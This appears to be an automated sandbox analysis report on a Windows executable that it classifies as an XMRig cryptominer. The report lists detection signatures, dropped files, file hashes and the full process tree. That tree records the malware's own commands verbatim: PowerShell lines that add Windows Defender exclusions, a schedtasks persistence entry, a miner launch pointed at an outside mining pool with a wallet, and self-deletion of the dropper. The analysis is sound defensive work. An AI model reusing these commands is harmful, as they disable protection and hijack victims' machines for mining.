Overview

overview

10

Static

static

3

894875eba3...67.exe

windows7-x64

8

894875eba3...67.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 19:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667.exe

  • Size

    110KB

  • MD5

    5a465bcb371fb929a0036e6273616d44

  • SHA1

    33cc1535f7cece4fba12ab2834c370a892d27601

  • SHA256

    894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667

  • SHA512

    d4741154e5d3e9a1f6d94200d28f0d379ae3382a10848ab55a26be563e72a55d74c633e1a304501084bd9a1dc882e4b8ae216839a692c247d0006d7f4192e822

  • SSDEEP

    1536:ErZ2Ycqg5o/iyOybKyzfF95ibIAvKJY2:ErgJqTaypKifF90Pg

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 8 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667.exe
    "C:\Users\Admin\AppData\Local\Temp\894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3864
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "explorer" /tr '"C:\Windows\system32\explorer.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3768
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "explorer" /tr '"C:\Windows\system32\explorer.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4364
        • C:\Windows\system32\explorer.exe
          "C:\Windows\system32\explorer.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3120
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2548
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3540
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:836
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4640
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4760
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\explorer.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2064
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\explorer.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1692
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "explorer" /tr '"C:\Windows\system32\explorer.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4600
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "explorer" /tr '"C:\Windows\system32\explorer.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4924
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:4484
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:33333 --user=83T35s79trGFeLPEYX4CBTE9TZ4xRALFL8JiBpZJrDzCPXxEsh7QiPx13ZiTaGz3fXj2m2YnnC9nRcHkqkck3snNCLjbF95 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1008
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1032
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 3
                  8⤵
                    PID:3180
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2096
            • C:\Windows\system32\choice.exe
              choice /C Y /N /D Y /T 3
              5⤵
                PID:1660

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
        Filesize

        539B

        MD5

        b245679121623b152bea5562c173ba11

        SHA1

        47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

        SHA256

        73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

        SHA512

        75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        b51dc9e5ec3c97f72b4ca9488bbb4462

        SHA1

        5c1e8c0b728cd124edcacefb399bbd5e25b21bd3

        SHA256

        976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db

        SHA512

        0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        7f107a644c29cea526f99621670f76d0

        SHA1

        0f26f4570f469474aedabddf1d56036d138d9fbe

        SHA256

        5e740c0741873dfef50b0888bdb8fc78e0a343261ff9aee380d3eda6fd8c3c78

        SHA512

        07d983f18f0aba8653f0801c81c50f3ef0da60e7ceee6b87f93bade961405501cf4889b2f8765c37b1658cf5ed4ec7f8f6f722211d2f98f247c15bc016c0c93b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        ef647504cf229a16d02de14a16241b90

        SHA1

        81480caca469857eb93c75d494828b81e124fda0

        SHA256

        47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

        SHA512

        a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        15dde0683cd1ca19785d7262f554ba93

        SHA1

        d039c577e438546d10ac64837b05da480d06bf69

        SHA256

        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

        SHA512

        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        83685d101174171875b4a603a6c2a35c

        SHA1

        37be24f7c4525e17fa18dbd004186be3a9209017

        SHA256

        0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

        SHA512

        005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ancm4ydh.qad.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        Filesize

        37KB

        MD5

        cf1be8fb5eb18d4c40ae75f030bcc142

        SHA1

        5e5a9aebfb44fbd2a1f5812f967ced20eab6284b

        SHA256

        7229b66a64cecab58cec6acdd8c3d628ef6514ad7c29ec5c4f5f6b239e3c819d

        SHA512

        4a92ed6c1200070620e59e5311e79ed21058c2d60095777279082ff15e1a44b47740cd24bbc18434944bf4873204ce17c888d80a9fb5773fb06fde58ddba2deb

        Download Submit

      • C:\Windows\System32\Microsoft\Libs\sihost64.exe
        Filesize

        7KB

        MD5

        43edbf90c7d6083aac693cbe9ffdf9b5

        SHA1

        33b0a146c85d78351dbd9d648f0cf6c0a10e3949

        SHA256

        515e1acb721ef9d34314f5021eeaabacfb5b94e4b9585c217bb3789bf5744f56

        SHA512

        acbc53375278776e9ebb0bff8cc803552ade9dff5cb23601a15aea3477d325108e02efa0ec234ed776f88273691d5b4291b1dac4e8ba1894dda5151bfb157508

        Download Submit

      • C:\Windows\System32\explorer.exe
        Filesize

        110KB

        MD5

        5a465bcb371fb929a0036e6273616d44

        SHA1

        33cc1535f7cece4fba12ab2834c370a892d27601

        SHA256

        894875eba3d359b0f02b3a4a38de35cfe06dc0633b96a43be14c1c4869b5a667

        SHA512

        d4741154e5d3e9a1f6d94200d28f0d379ae3382a10848ab55a26be563e72a55d74c633e1a304501084bd9a1dc882e4b8ae216839a692c247d0006d7f4192e822

        Download Submit

      • memory/1008-148-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-143-0x00000000005C0000-0x00000000005E0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1008-149-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-145-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-144-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-142-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-141-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-146-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1008-147-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1112-18-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1112-12-0x00000151A2070000-0x00000151A2092000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1112-13-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1112-14-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1112-15-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2752-62-0x0000000002C70000-0x0000000002C82000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2752-61-0x00000000002F0000-0x00000000002FE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/3864-0-0x00007FFCFBDB3000-0x00007FFCFBDB5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3864-1-0x0000000000810000-0x0000000000830000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3864-2-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3864-57-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3864-54-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3864-53-0x00007FFCFBDB3000-0x00007FFCFBDB5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4484-139-0x0000000000B30000-0x0000000000B36000-memory.dmp

        Filesize

        24KB

        Download